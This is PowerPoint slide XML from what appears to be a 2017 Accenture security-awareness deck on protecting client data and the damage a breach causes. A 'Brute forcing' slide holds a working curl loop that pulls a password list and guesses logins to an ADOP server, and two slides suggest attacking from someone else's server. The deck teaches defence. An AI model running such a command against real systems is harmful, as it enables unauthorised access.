        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent5">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="177678" y="4294124"/>
            <a:ext cx="5414265" cy="24307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6080249" y="4520149"/>
            <a:ext cx="5905500" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="55562" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>** CLIENT DATA = any of their code, designs documentations, configuration, intellectual property, data etc.  This even includes anything with their name on. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="55562" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>** We shouldn’t be working with any data with real personal data, credit card numbers etc.  If you think we are – call out TODAY.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6080249" y="3423102"/>
            <a:ext cx="5905500" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="55562" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>* Accenture and/or the client getting sued with the likely outcome financial and reputational if not criminal damage.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="000000"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="000000">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4423820" y="5150627"/>
            <a:ext cx="641496" cy="936102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30388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1052736"/>
            <a:ext cx="5498976" cy="4689475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker gets hands on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Even without a malicious intent the Hacker may want to keep backdoors open to prolong the hack or for future use.  (Scary)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If inclined especially if with prior motive, they could be capable of unknown levels theft, corruption, impersonation, defamation etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="381000"/>
            <a:ext cx="11430000" cy="599204"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The imbalance of damage </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="980729"/>
            <a:ext cx="5715000" cy="2592288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The damage to us is FAR GREATER IN SO MANY WAYS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As per the previous page, times infinity!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8760296" y="212716"/>
            <a:ext cx="3653516" cy="407972"/>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0" kern="1200" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Greedy / malicious  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>targeted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent5">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="177678" y="4294124"/>
            <a:ext cx="5414265" cy="24307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3">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="000000"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="000000">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3452161" y="3120508"/>
            <a:ext cx="2911410" cy="4248473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39252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836712"/>
            <a:ext cx="11259616" cy="5466273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>It’s not rocket science!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>It’s not even as hard as creating injection acts, let alone exploiting a “buffer underrun”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>There are lots of more advanced options like phishing, but here’s a basic approach:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Google for tools that will scan the internet vulnerabilities (or look on Darkweb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Run those tools (ideally from someone else’s server if you already have one)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>The tool will do something that ranges from notifying your about the vulnerable server, to actually attacking it, owning it and running your code e.g. DDOS-ing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Often the first vulnerability won’t lead to full system access, so the next step is to onwardly hack e.g. to become root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>The first hack will only be to one server, but if your server has remote access, so does the hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buFont typeface="Graphik" panose="020B0503030202060203" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>The first hack won’t be to your cloud account, but if your server API access, so does the hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Morale of the story – try to think more like a hacker and hopefully you will be safer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Analogy, Q: if you have car keys, do you leave them by the front door in your house</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>A1: if you don’t want your car stolen, of course not!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>A2: unless you’d rather an intruder made off with your car (which is insured) that other harder to replace / personal possessions, e.g. that notebook with your bank details in &lt;&lt; DOH!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>If you want to try things out: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://webappsecmovies.sourceforge.net/webgoat/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="380999"/>
            <a:ext cx="11430000" cy="527721"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How to actually hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7608168" y="188640"/>
            <a:ext cx="4583832" cy="407972"/>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0" kern="1200" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If experimenting, stay legal and out of jail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12821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2" presetClass="emph" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animRot by="120000">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="50" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="100"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="240000">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="300"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="120000">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="4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836712"/>
            <a:ext cx="11259616" cy="5466273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>It’s not rocket science!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Brute forcing an ADOP from the command line (hardly any more characters than a tweet):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Open up a shell (ideally from someone else’s server if you already have one)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741356" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Execute:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ export ADOPURL=http://&lt;adop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</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curl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://dazzlepod.com/site_media/txt/passwords.txt</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GB" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while read PW; do curl -fs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:"$PW"@$ADOPURL &gt; /dev/null; \</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if [ $? == 0 ]; then echo Your ADOP password is: $PW; fi ; done</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Brute forcing a website: there are browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>addins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> that do this!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="380999"/>
            <a:ext cx="11430000" cy="527721"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How to actually hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7610028" y="320728"/>
            <a:ext cx="4583832" cy="407972"/>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0" kern="1200" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute forcing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134950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2" presetClass="emph" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animRot by="120000">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="50" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="100"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="240000">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="300"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="120000">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="100" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="4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39694"/>
            <a:ext cx="12192000" cy="8097694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1988840"/>
            <a:ext cx="7927848" cy="4991100"/>
          </a:xfrm>
